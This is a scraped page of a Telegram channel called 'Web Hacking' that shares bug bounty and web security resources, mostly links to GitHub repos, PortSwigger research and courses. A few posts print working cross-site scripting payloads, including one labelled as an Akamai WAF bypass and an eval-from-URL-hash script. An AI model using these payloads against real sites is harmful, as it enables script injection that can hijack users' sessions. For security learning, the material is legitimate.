Web Hacking
@WebHacking
2.09K subscribers
41 photos
6 files
37 links
@CEH_training
@OSCP_training
@pfsense
@WifiHacking
Download Telegram
About
Blog
Apps
Platform
Join
Web Hacking
2.09K subscribers
Web Hacking
https://github.com/nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
GitHub
GitHub - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters: A list of resources for those interested in getting started in bugโ€ฆ
A list of resources for those interested in getting started in bug bounties - nahamsec/Resources-for-Beginner-Bug-Bounty-Hunters
5.9K views
Web Hacking
Free for only 24hrs

https://www.udemy.com/course/broad-scope-bug-bounties-from-scratch/?couponCode=9943A2D06E764688003B
5.0K views
Web Hacking
https://portswigger.net/research/new-xss-vectors
PortSwigger Research
New XSS vectors
Transition based events without style blocks So, recently, I was updating our XSS cheat sheet to fix certain vectors that had been made obsolete by browser updates. Whilst looking at the vectors, the
3.2K views
Web Hacking
https://github.com/mandatoryprogrammer/xsshunter
GitHub
GitHub - mandatoryprogrammer/xsshunter: The XSS Hunter service - a portable version of XSSHunter.com
The XSS Hunter service - a portable version of XSSHunter.com - mandatoryprogrammer/xsshunter
3.4K views
Web Hacking
Forwarded from ๐Ÿ”ฅOSCP Training๐Ÿ”ฅ๐Ÿ›กโš”๏ธ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
https://medium.com/@jonathan_fulton/web-architecture-101-a3224e126947

๐Ÿ“ŒFollow @oscp_training
Medium
Web Architecture 101
The basic architecture concepts I wish I knew when I was getting started as a web developer
3.0K views
Web Hacking
10.2K views
Web Hacking
@WebHacking
@WifiHacking
@OSCP_training
@PfSense
79.3K views
Web Hacking
12.3K views
Web Hacking
SSRF
13.3K views
Web Hacking
https://tttttt.me/bug_bounty_bootcamp
4.1K views
Web Hacking
Web Hacking pinned ยซhttps://tttttt.me/bug_bounty_bootcampยป
Web Hacking
Akamai WAF bypass

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
9.7K views
Web Hacking
Forwarded from ๐Ÿ”ฅOSCP Training๐Ÿ”ฅ๐Ÿ›กโš”๏ธ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
3.1K views
Web Hacking
A nice way to store the payload

"><script>eval(new URL(document.location.href+"#javascript:confirm(69)").hash.slice(1))</script>
10.0K views
Web Hacking
A payload to bypass Akamai WAF

<A href="javascrip%09t&colon;eval.apply`${[jj.className+`(23)`]}`" id=jj class=alert>Click Here
10.1K views
Web Hacking
Another one


"><img/src/style=html:url("data:,"><svg/onload=confirm(69)>")>
10.5K views
Web Hacking
Forwarded from ๐Ÿ”ฅOSCP Training๐Ÿ”ฅ๐Ÿ›กโš”๏ธ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning
PortSwigger Research
Making HTTP header injection critical via response queue poisoning
HTTP header injection is often under-estimated and misclassified as a moderate severity flaw equivalent to XSS or worse, Open Redirection. In this post, I'll share a simple technique I used to take a
2.9K views
Web Hacking
Forwarded from ๐Ÿ”ฅOSCP Training๐Ÿ”ฅ๐Ÿ›กโš”๏ธ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack#:~:text=specialWordlists.py.-,Command%20line%20usage,-From%20time%20to
3.1K views
Web Hacking
3.1K views
Web Hacking
Forwarded from ๐Ÿ”ฅOSCP Training๐Ÿ”ฅ๐Ÿ›กโš”๏ธ๐Ÿ‘จ๐Ÿปโ€๐Ÿ’ป
Checklist; After Recon
3.1K views